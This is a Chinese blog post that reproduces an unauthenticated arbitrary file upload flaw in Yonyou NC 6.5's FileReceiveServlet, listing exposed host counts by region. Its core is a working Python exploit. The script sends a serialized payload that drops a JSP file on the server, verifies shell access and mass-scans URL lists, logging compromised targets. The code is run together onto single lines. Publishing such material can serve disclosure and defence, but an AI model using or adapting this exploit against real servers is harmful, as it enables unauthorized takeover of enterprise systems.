用友NC任意文件上传漏洞复现
0x00 事件描述
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。
用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
0x01 漏洞原理
根据文档,FileReceiveServlet所对应的类为com.yonyou.ante.servlet.FileReceiveServlet。
jar包所在目录:/yonyou\home\modules\uapss\lib。
由于68行代码通过File outFile = new File(path, fileName)创建了一个文件,导致攻击者可通过此进行任意文件上传。
0x02 影响版本
用友NC远程代码执行漏洞影响版本:NC6.5之后版本。
0x03 影响范围
互联网侧使用用友NC的IP,中国大陆使用数量最多,共有 9174 个;北京使用数量最多,共有 1,239 个;广东第二,共有 587 个;贵州第三,共有 575 个,上海第四,共有 541 个;江苏第五,共有 433 个。
0x04 漏洞验证POC脚本
import requests
import threadpool
import urllib3
import sys
import argparseurllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36","Content-Type": "application/x-www-form-urlencoded","Referer": "https://google.com",
}def multithreading(funcname, filename="url.txt", pools=5):works = []with open(filename, "r") as f:for i in f:func_params = [i.rstrip("\n")]works.append((func_params, None))pool = threadpool.ThreadPool(pools)reqs = threadpool.makeRequests(funcname, works)[pool.putRequest(req) for req in reqs]pool.wait()def wirte_targets(vurl, filename):with open(filename, "a+") as f:f.write(vurl + "\n")return vurldef exp(u):uploadHeader = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36","Content-Type": "multipart/form-data;","Referer": "https://google.com"}uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"shellFlag="t0test0ls"uploadData+=shellFlagtry:req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)if req1.status_code == 200 :req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)if req3.text.index(shellFlag)>=0:printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"print (printFlag)wirte_targets(printFlag, "vuln.txt")except :pass#print(printFlag, end="")if __name__ == "__main__":if (len(sys.argv)) < 2:print('useage : python' +str(sys.argv[0]) + ' -h')else:parser =argparse.ArgumentParser()parser.description ='YONYOU UC 6.5 FILE UPLOAD!'parser.add_argument('-u',help="url -> example [url]http://127.0.0.1[/url]",type=str,dest='check_url')parser.add_argument('-r',help="url list to file",type=str,dest='check_file')args =parser.parse_args()if args.check_url:exp(args.check_url)if(args.check_file):multithreading(exp, args.check_file, 8)
0x05 修复建议
请联系厂商获取补丁更新:https://www.yonyou.com/
0x06 参考链接
转载请注明:Adminxe's Blog » 用友NC任意文件上传漏洞复现
用友NC任意文件上传漏洞复现相关推荐
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
- 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...
- 畅捷通T+ v17任意文件上传漏洞复现
1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- UEditor .Net版本任意文件上传漏洞复现
目录 漏洞背景 漏洞影响 漏洞利用 漏洞分析 防御措施 漏洞背景 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器 漏洞影响 该漏洞影响UEditor的.N ...
- CVE-2022-29464 WSO2 任意文件上传漏洞复现
目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: vulfocus搭建: 0x06 漏洞复现: 1.EXP利用: 2.Burp改包: 0x07 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- 漏洞复现 用友畅捷通T+任意文件上传漏洞(CNVD-2022-60632)
文章目录 漏洞复现 用友畅捷通T+任意文件上传漏洞(CNVD-2022-60632) 1. 用友畅捷通T+简介 2.漏洞描述 3.影响版本 4.fofa 查询语句 5.漏洞复现 6.POC&E ...
- 最新用友NC6.5文件上传漏洞
0x00漏洞公告 用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新 ...
最新文章
- 2020牛客多校第1场H-Minimum-cost Flow
- SpringBoot使用prometheus监控
- java Bean 不需要自动生成get和set
- xor java_java基于密匙的xor加解密
- 途牛网站无线架构变迁实践
- 【Silverlight】解决DataTemplate绑定附加属性
- java ssl证书_Java安全教程–创建SSL连接和证书的分步指南
- SQL WITH NOCHECK 和 CLUSTERED | NONCLUSTERED
- ECCV 2020 论文大盘点-视频目标分割篇
- Many to many example - 1 of 4
- 24楼,此处风景独好
- 在Jenkins平台上运行Jmeter
- 超级计算机预测未来,超级计算机预测未来
- 零度之下代码输入不了_瞧一瞧康一康吖!简单又好玩的代码
- Linux系统中如何查看日志信息
- 如何使用Outlook创建带有超链接的图片签名
- 使用PIL改变图像分辨率
- 使用微擎 微赞 微信登陆遇到redirect_uri 参数错误的设置办法
- matlab 画qq图,科学网—[转载]R语言绘制QQ图 - 刘朋的博文
- 低配本用win10服务器系统,低配电脑用win7还是win10比较好_低配置电脑装win7还是win10系统合适...